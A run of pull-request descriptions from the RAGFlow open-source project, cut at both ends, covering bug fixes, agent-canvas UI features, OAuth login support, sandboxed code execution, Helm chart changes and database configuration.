for `parameters`.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Add advanced delimiter detection for naive merge. #7824
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
it would be fail if PARALLEL_DEVICES = None in OCR class , because it
pass 0 to TextDetector and TextRecognizer init method.
and It would be simpler to set 0 as the default value for
PARALLEL_DEVICES.
### Type of change
- [x] Refactoring
### What problem does this PR solve?
https://github.com/infiniflow/ragflow/issues/7908
For the code
` _, out = cpn.output(allow_partial=False)`
` def output(self, allow_partial=True) -> Tuple[str, Union[pd.DataFrame,
partial]]:
o = getattr(self._param, self._param.output_var_name)`
need to call this method
But I do not have a full context.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Use memo to wrap canvas nodes to improve fluency #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
Truncate long agent descriptions to prevent overflow outside the agent
card container
### What problem does this PR solve?
Now the Long text of description will overflow from the agent card,
should display the long text properly with truncate.
<img width="275" alt="Screenshot 2025-05-28 220329"
src="https://github.com/user-attachments/assets/954b3a48-bcab-4669-a42f-6981d4bf859f"
/>
<img width="275" alt="Screenshot 2025-05-28 220353"
src="https://github.com/user-attachments/assets/f385d95a-3e40-4117-b412-ae6a4508e646"
/>
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
Feat:: Use useWatch to synchronize the form data to canvas zustand #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Change citation mark as [ID:n], it's easier for LLMs to follow the
instruction :) #7904
### Type of change
- [x] Refactoring
### What problem does this PR solve?
Fix: Display bug in the early stage of conversation chat #7904
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix early return when update doc. #7886
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
…sing the SDK chat API
### What problem does this PR solve?
When using the SDK for chat, you can include the IDs of additional
knowledge bases you want to use in the request. This way, you don’t need
to repeatedly create new assistants to support various combinations of
knowledge bases. This is especially useful when there are many knowledge
bases with different content. If users clearly know which knowledge base
contains the information they need and select accordingly, the recall
accuracy will be greatly improved.
Users only need to add an extra field, a kb_ids array, in the HTTP
request. The content of this field can be determined by the client
fetching the list of knowledge bases and letting the user select from
it.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
Co-authored-by: Li Ye <liye@unittec.com>
conversation change to sessions
### What problem does this PR solve?
related_question interface has wrong uri in HTTP API doc
### Type of change
- [x] Documentation Update
### What problem does this PR solve?
Close#7879
I checked the current master code, the kb_parser_config is join from
knowledge table, so I think should be some edge cases due to history
data
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
**Issue Description:**
When using the `/api/retrieval` endpoint with a POST request and setting
the `keyword` parameter to `true`, the system invokes the
`model_instance` method from `TenantLLMService` to create a `chat_mdl`
instance. Subsequently, it calls the `keyword_extraction` method to
extract keywords.
However, within the `keyword_extraction` method, the `chat` function of
the LLM attempts to access the `chat_mdl.max_length` attribute to
validate input length. This results in the following error:
```
AttributeError: 'SILICONFLOWChat' object has no attribute 'max_length'
```
**Proposed Solution:**
Upon reviewing other parts of the codebase where `chat_mdl` instances
are created, it appears that utilizing `LLMBundle` for instantiation is
more appropriate. `LLMBundle` includes the `max_length` attribute, which
should resolve the encountered error.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
add DeepWiki Badge Maker
### Type of change
- [x] Other (please describe):add DeepWiki Badge Maker
---------
Co-authored-by: lixiaodong11 <lixiaodong11@hikvision.com.cn>
### What problem does this PR solve?
Feat: Add the SelectWithSearch component #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Put buildSelectOptions to common-util.ts #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
There are two main changes:
1. Update xgboost to 1.6.0 to build the project on MacOS with Apple
chips, this change refers to the issue:
https://github.com/infiniflow/ragflow/issues/5114.
2. When `use_china_mirrors` is set in `download_deps.py`, the names of
chrome files downloaded by the script will be different from the file
names used in Dockerfile, so I added the file name in `get_urls`
function to solve this problem.
I think it's better to add testing for Docker image
`infiniflow/ragflow_deps` to the test workflow, but since the workflow
is currently running on a self-hosted runner, I'm not sure how to modify
it.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
Feat: Add the WaitingDialogue operator. #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
This PR solve the problems metioned in the
pr(https://github.com/infiniflow/ragflow/pull/7140) which is also
submitted by me
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### Introduction
I fixed the problems when using OpenSearch as the DOC_ENGINE, the
failures of pytest and the wrong API's return.
Mainly about delete chunk, list chunks, update chunk, retrieval chunk.
The pytest comand "cd sdk/python && uv sync --python 3.10 --group test
--frozen && source .venv/bin/activate && cd test/test_http_api &&
DOC_ENGINE=opensearch pytest test_chunk_management_within_dataset -s
--tb=short " is finally successful.
###Others
As some changes between Elasticsearch And Opensearch differ, some pytest
results about OpenSearch are correct and resonable. However, some pytest
params (skipif params) are incompatible. So I changed some pytest params
about skipif.
As a search engine programmer, I will still focus on the usage of vector
databases (especially OpenSearch) for the RAG stuff.
Thanks for your review
### What problem does this PR solve?
Feat: Convert the data of the messge operator to a string array #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [x] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
Feat: Upgrade react-hook-form to the latest version to solve the problem
that appending a useFieldArray entry cannot trigger the watch callback
function #3221
[issue: watch is not called when appending first item to Field Array
#12370](https://github.com/react-hook-form/react-hook-form/issues/12370)
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Close#7830
The caller method should already have code to handle this.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Delete Corresponding Minio Bucket When Deleting a Knowledge Base
[issue #4113 ](https://github.com/infiniflow/ragflow/issues/4113)
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: Fixed the issue that the script text of the code operator is not
displayed after refreshing the page after saving the script text of the
code operator #4977
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Refactor the MessageForm with shadcn #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Add more robust fallbacks for citations
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
change default models to buildin models
https://github.com/infiniflow/ragflow/issues/7774
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
1. Add sandbox options for max memory and timeout.
2. Malicious code detection for Python only.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Add code_executor_manager. #4977.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Translate the begin operator #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Reconstruct the QueryTable of BeginForm using shandcn #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Synchronize BeginForm's query data to the canvas #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Co-authored-by: xiaohzho <xiaohzho@cisco.com>
### What problem does this PR solve?
_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._
### Type of change
- [x] Documentation Update
### What problem does this PR solve?
Feat: Verify the parameters of the begin operator #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Refactor BeginForm with shadcn #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
This small PR resolves the regex library warnings showing in Python3.11:
```python
DeprecationWarning: 'count' is passed as positional argument
```
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [x] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
Signed-off-by: Emmanuel Ferdman <emmanuelferdman@gmail.com>
### What problem does this PR solve?
https://github.com/infiniflow/ragflow/issues/7761
but it may be difficult to achieve 0 delay (which need to pass the
cancel token to all parts)
Another solution is just 0 delay effect at UI.
And task will stop latter
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Add return value widget to CodeForm #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Switching the programming language of the code operator will
switch the corresponding language template #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Fixed the issue where the page would refresh continuously when
opening the sheet on the right side of the canvas #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
delete useless image blobs when the task executor meets edge cases
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Render the agent list page by page #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Migrate the code operator to the new agent. #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: The image displayed in the reply message can also be clicked to
display the location of the source document where the slice is located
#7623
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
This PR introduces Pydantic-based validation for the list datasets HTTP
API, improving code clarity and robustness. Key changes include:
Pydantic Validation
Error Handling
Test Updates
Documentation Updates
### Type of change
- [x] Documentation Update
- [x] Refactoring
### What problem does this PR solve?
Add OAuth `state` parameter for CSRF protection:
- Updated `get_authorization_url()` to accept an optional state
parameter
- Generated a unique state value during OAuth login and stored in
session
- Verified state parameter in callback to ensure request legitimacy
This PR follows OAuth 2.0 security best practices by ensuring that the
authorization request originates from the same user who initiated the
flow.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix:When you create a new API module named xxxa_api, the access route
will become xxx instead of xxxa. For example, when I create a new API
module named 'data_api', the access route will become 'dat' instead of
'data'
Fix:Fixed the issue where the new knowledge base would not be renamed
when there was a knowledge base with the same name
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
---------
Co-authored-by: tangyu <1@1.com>
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
Feat: Modify the Python language template code of the code operator
#4977
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
More fallbacks for bad citation format
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [x] Refactoring
### What problem does this PR solve?
Fixed uncaptured figure data with position information. #7466, #7681
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
Try the best to repair corrupted PDF files on upload automatically.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
- Updated the dialog settings function to add a default prompt
configuration for no dataset.
- The prompt configuration will be determined based on the presence of
`kb_ids` in the request.
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [x] New Feature (Non-breaking change, adding functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
---------
Co-authored-by: wenju.li <wenju.li@deepctr.cn>
### What problem does this PR solve?
## Cause of the bug:
During the execution process, due to improper use of trio
CapacityLimiter, the configuration parameter MAX_CONCURRENT_TASKS is
invalid, causing the executor to take out a large number of tasks from
the Redis queue at one time.
This behavior will cause the task executor to occupy too much memory and
be killed by the OS when a large number of tasks exist at the same time.
As a result, all executing tasks are suspended.
## Fix:
Added the task_manager method to the entry of /rag/svr/task_executor.py
to make CapacityLimiter effective. Deleted the invalid async with
statement.
## Fix result:
After testing, the task executor execution meets expectations, that is:
concurrent execution of up to $MAX_CONCURRENT_TASKS tasks.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
Hello, when I input a very long line in the chat input box, it will fail
with following error:
```
2025-05-17 16:11:26,004 ERROR 182558 value too long for type character varying(255)
Traceback (most recent call last):
File "/var/home/sfc/Projects/ragflow/.venv/lib/python3.10/site-packages/peewee.py", line 3291, in execute_sql
cursor.execute(sql, params or ())
psycopg2.errors.StringDataRightTruncation: value too long for type character varying(255)
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "/var/home/sfc/Projects/ragflow/api/apps/conversation_app.py", line 68, in set_conversation
ConversationService.save(**conv)
File "/var/home/sfc/Projects/ragflow/.venv/lib/python3.10/site-packages/peewee.py", line 3128, in inner
return fn(*args, **kwargs)
File "/var/home/sfc/Projects/ragflow/api/db/services/common_service.py", line 145, in save
return cls.save_n(**kwargs)
File "/var/home/sfc/Projects/ragflow/api/db/services/common_service.py", line 139, in save_n
sample_obj = cls.model(**kwargs).save(force_insert=True)
File "/var/home/sfc/Projects/ragflow/.venv/lib/python3.10/site-packages/peewee.py", line 6923, in save
pk = self.insert(**field_dict).execute()
File "/var/home/sfc/Projects/ragflow/.venv/lib/python3.10/site-packages/peewee.py", line 2011, in inner
return method(self, database, *args, **kwargs)
File "/var/home/sfc/Projects/ragflow/.venv/lib/python3.10/site-packages/peewee.py", line 2082, in execute
return self._execute(database)
File "/var/home/sfc/Projects/ragflow/.venv/lib/python3.10/site-packages/peewee.py", line 2887, in _execute
return super(Insert, self)._execute(database)
File "/var/home/sfc/Projects/ragflow/.venv/lib/python3.10/site-packages/peewee.py", line 2598, in _execute
cursor = self.execute_returning(database)
File "/var/home/sfc/Projects/ragflow/.venv/lib/python3.10/site-packages/peewee.py", line 2605, in execute_returning
cursor = database.execute(self)
File "/var/home/sfc/Projects/ragflow/.venv/lib/python3.10/site-packages/peewee.py", line 3299, in execute
return self.execute_sql(sql, params)
File "/var/home/sfc/Projects/ragflow/.venv/lib/python3.10/site-packages/peewee.py", line 3289, in execute_sql
with __exception_wrapper__:
File "/var/home/sfc/Projects/ragflow/.venv/lib/python3.10/site-packages/peewee.py", line 3059, in __exit__
reraise(new_type, new_type(exc_value, *exc_args), traceback)
File "/var/home/sfc/Projects/ragflow/.venv/lib/python3.10/site-packages/peewee.py", line 192, in reraise
raise value.with_traceback(tb)
File "/var/home/sfc/Projects/ragflow/.venv/lib/python3.10/site-packages/peewee.py", line 3291, in execute_sql
cursor.execute(sql, params or ())
peewee.DataError: value too long for type character varying(255)
```
This PR fix it by truncate the `name` field in the `set_conversation`
method in the `conversation_app.py`.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
Feat: Rendering recall test page #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: Fixed the issue where message references could not be displayed
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Hello, our use case requires LLM agent to invoke some tools, so I made a
simple implementation here.
This PR does two things:
1. A simple plugin mechanism based on `pluginlib`:
This mechanism lives in the `plugin` directory. It will only load
plugins from `plugin/embedded_plugins` for now.
A sample plugin `bad_calculator.py` is placed in
`plugin/embedded_plugins/llm_tools`, it accepts two numbers `a` and `b`,
then give a wrong result `a + b + 100`.
In the future, it can load plugins from external location with little
code change.
Plugins are divided into different types. The only plugin type supported
in this PR is `llm_tools`, which must implement the `LLMToolPlugin`
class in the `plugin/llm_tool_plugin.py`.
More plugin types can be added in the future.
2. A tool selector in the `Generate` component:
Added a tool selector to select one or more tools for LLM:

And with the `bad_calculator` tool, it results this with the `qwen-max`
model:

### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [x] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
Co-authored-by: Yingfeng <yingfeng.zhang@gmail.com>
### What problem does this PR solve?
Improve oauth configuration documentation and examples.
- Related pull requests:
- #7379
- #7553
- #7587
- Related issues:
- #3495
### Type of change
- [x] Documentation Update
### What problem does this PR solve?
Fix: Fixed the issue where the height of the chat page shared externally
did not fill the window #7460
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Launch sandbox from docker-compose.
#4977
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
- [x] Documentation Update
---------
Co-authored-by: writinwaters <93570324+writinwaters@users.noreply.github.com>
### What problem does this PR solve?
Close#7655
Based on the codes atthe api_app, I think the reference is one-to-one
with the message
`
def fillin_conv(ans):
nonlocal conv, message_id
if not conv.reference:
conv.reference.append(ans["reference"])
else:
conv.reference[-1] = ans["reference"]
conv.message[-1] = {"role": "assistant", "content": ans["answer"], "id":
message_id}
ans["id"] = message_id
`
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Add code agent component.
#4977
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
This PR introduces Pydantic-based validation for the delete dataset HTTP
API, improving code clarity and robustness. Key changes include:
1. Pydantic Validation
2. Error Handling
3. Test Updates
4. Documentation Updates
### Type of change
- [x] Documentation Update
- [x] Refactoring
### What problem does this PR solve?
Feat: Fixed the issue where the dataset configuration page kept
refreshing #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: Use DOMPurify to filter out dangerous HTML #7668
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Add the JS code (or other) executor component to Agent. #4977
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Deprecate `/github_callback` route in favor of
`/oauth/callback/<channel>` for GitHub OAuth integration:
- Added GitHub OAuth support in the authentication module
- Introduced `GithubOAuthClient` with methods to fetch and normalize
user info
- Updated `CLIENT_TYPES` to include GitHub OAuth client
- Deprecated `/github_callback` route and suggested using the generic
`/oauth/callback/<channel>` route
---
- Related pull requests:
- #7379
- #7553
### Usage
- [Create a GitHub OAuth
App](https://github.com/settings/applications/new) to obtain the
`client_id` and `client_secret`, configure the authorization callback
url: `https://your-app.com/v1/user/oauth/callback/github`
- Edit `service_conf.yaml.template`:
```yaml
# ...
oauth:
github:
type: "github"
icon: "github"
display_name: "Github"
client_id: "your_client_id"
client_secret: "your_client_secret"
redirect_uri: "https://your-app.com/v1/user/oauth/callback/github"
# ...
```
### Type of change
- [x] Documentation Update
- [x] Refactoring (non-breaking change)
TOML-table-based project.license is deprecated as per PEP 639, see:
https://packaging.python.org/en/latest/guides/writing-pyproject-toml/#license-and-license-files
### What problem does this PR solve?
The following error when building project (e.g. `uv build`)
```
SetuptoolsDeprecationWarning: `project.license` as a TOML table is deprecated
!!
********************************************************************************
Please use a simple string containing a SPDX expression for `project.license`. You can also use `project.license-files`. (Both options available on setuptools>=77.0.0).
By 2026-Feb-18, you need to update your project and remove deprecated calls
or your builds will no longer be supported.
See https://packaging.python.org/en/latest/guides/writing-pyproject-toml/#license for details.
********************************************************************************
!!
```
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
For `uv package`/`uv pip install ".[full]"`, bug introduced in #6370:
* Removes erroneous (non-package) directories (`helm`, `flask_session`)
* Adds `mcp.server` package
* Resolves "warning: package would be ignored" ambiguity by changing
`sdk` to `sdk.python.ragflow_sdk`
* Resolves "error: package directory 'intergrations' does not exist" by
including `intergrations.chatgpt-on-wechat.plugins` explicitly
* Also rearranges packages in alphabetical order, for DX.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
When Delete Chunk Will Also Delete Chunk Related Image
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._
### Type of change
- [x] Other (please describe): llm factories update
### What problem does this PR solve?
_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._
### Type of change
- [x] Documentation Update
### What problem does this PR solve?
Feat: Add data set configuration form #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Display inline (non-quoted) images in the chat and search modules
#7623
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Update 7 readme
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [x] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
Add libjemalloc installation command. If the operating system does not
have the libjemalloc library, the execution of entrypoint.sh and
launch_backend_service.sh will be interrupted, and the
rag/svr/task_executor.py script will not be started normally.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [x] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
Add frontend support for third-party login integration:
- Used `getLoginChannels` API to fetch available login channels from the
server
- Used `loginWithChannel` function to initiate login based on the
selected channel
- Refactored `useLoginWithGithub` hook to `useOAuthCallback` for
generalized OAuth callback handling
- Updated the login page to dynamically render third-party login buttons
based on the fetched channel list
- Styled third-party login buttons to improve user experience
- Removed unused code snippets
> This PR removes the previously hardcoded GitHub login button. Since
the functionality only worked when `location.host` was equal to
`demo.ragflow.io`, and the authentication logic is now based on
`login.ragflow.io`, this change does not affect the existing logic and
is considered a non-breaking change
---
#### Frontend Screenshot && Backend Configuration

```yaml
# docker/service_conf.yaml.template
# ...
oauth:
github:
icon: github
display_name: "Github"
# ...
custom_channel:
display_name: "OIDC"
# ...
custom_channel_2:
display_name: "OAuth2"
# ...
```
---
- Related pull requests:
- #7379
- #7521
- Related issues:
- #3495
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
- [x] Refactoring
- [x] Performance Improvement
### What problem does this PR solve?
Feat: Show images in reply messages #7608
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Fixed the issue where the chat page would jump after entering the
homepage #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Adjust the display position of recall test item images #7608
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Info of whether applying graph resolution and community extraction is
storage in `task["kb_parser_config"]`. However, previous code get
`graphrag_conf` from `task["parser_config"]`, making `with_resolution`
and `with_community` are always false.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
Feat: Add FormContainer component #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix HTTP API Create/Update dataset parser config default value error
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Adds support for the GPT-4.1 series from OpenAI.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Hello, we are using ragflow as a backend service, so we need to manage
agents from our own frontend. So adding these http APIs to manage
agents.
The code logic is copied and modified from the `rm` and `save` methods
in `api/apps/canvas_app.py`.
btw, I found that the `save` method in `canvas_app.py` actually allows
to modify an agent to an existing title, so I kept the behavior in the
http api. I'm not sure if this is intentional.
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [x] New Feature (non-breaking change which adds functionality)
- [x] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
Since `import markdown.markdown` has been changed to `import markdown`
in `rag/app/naive.py`, previous code for converting markdown tables
would call a markdown module instead of a callable function. This cause
error.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
Modified the chart to retain persistent volumes by default when the
chart is uninstalled, following established best practices in the Helm
community (e.g., Bitnami charts)
### What problem does this PR solve?
Previously, deleting the helm chart would automatically remove all
persistent data, which poses a risk of accidental data loss.
### Rationale
This change aligns with industry standards to safeguard data by
requiring explicit action to remove persistence, rather than making
deletion the default behavior.
### Impact:
Users who intentionally want to remove persistent data will need to do
so manually or by setting appropriate flags during chart uninstallation.
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [x] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
As RAGFlow has an integration with Langfuse, this docs page shows how to
configure Langfuse tracing.
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [x] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
This PR introduces Pydantic-based validation for the update dataset HTTP
API, improving code clarity and robustness. Key changes include:
1. Pydantic Validation
2. Error Handling
3. Test Updates
4. Documentation Updates
5. fix bug: #5915
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [x] Documentation Update
- [x] Refactoring
### What problem does this PR solve?
Fixes bug & regression introduced by [PR #7187 - refactor: Update Redis
configuration to use StatefulSet instead of deployment with
pvc](https://github.com/infiniflow/ragflow/pull/7187):
1. Fixes bug #7403 - `redis.persistence.enabled` missing from
`helm/values.yaml` causes helm error:
[ERROR] templates/: template: ragflow/templates/redis.yaml:55:24:
executing "ragflow/templates/redis.yaml" at
<.Values.redis.persistence.enabled>: nil pointer evaluating interface
{}.enabled
2. Fixes regression: reverts hardcoded redis.storage.capacity value back
to using variable `redis.storage.capacity` from `helm/values.yaml`.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
1. The MySQL instance is configured with max_connections=1000,
but our connection pool was limited to max_connections: 100.
This mismatch caused connection pool exhaustion during performance
testing.
2. Increase stale_timeout to resolve#6548
### Type of change
- [x] Performance Improvement
### What problem does this PR solve?
Feat: Cross-language query #7376#4503#5710#7470
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
Kb detail supports return document total size now.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Add scheduled workflow for daily HTTP API full tests
Configure cron job to trigger at 16:00:00Z(00:00:00+08:00)
### Type of change
- [X] CI update
### What problem does this PR solve?
Feat: Replace the submit form button with ButtonLoading #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
Two Case when local Es tag search has result which is filtered by score
1: Doc has empty tag,and not visi LLM
2: Code may use empty examples in Prompt for LLM search tag
Co-authored-by: huangfuqunze <huangfuqunze.hfqz@alibaba-inc.com>
### What problem does this PR solve?
The parameter positions were incorrect and have been corrected to use
keyword argument passing
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Adjust the operation cell of the table on the file management page
and dataset page #3221.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
fix deepseek-ai/deepseek-vl2 model can not be select as a VL model to
parse pdf image . And add other vl models config from siliconflow
_Briefly describe what this PR aims to solve. Include background context
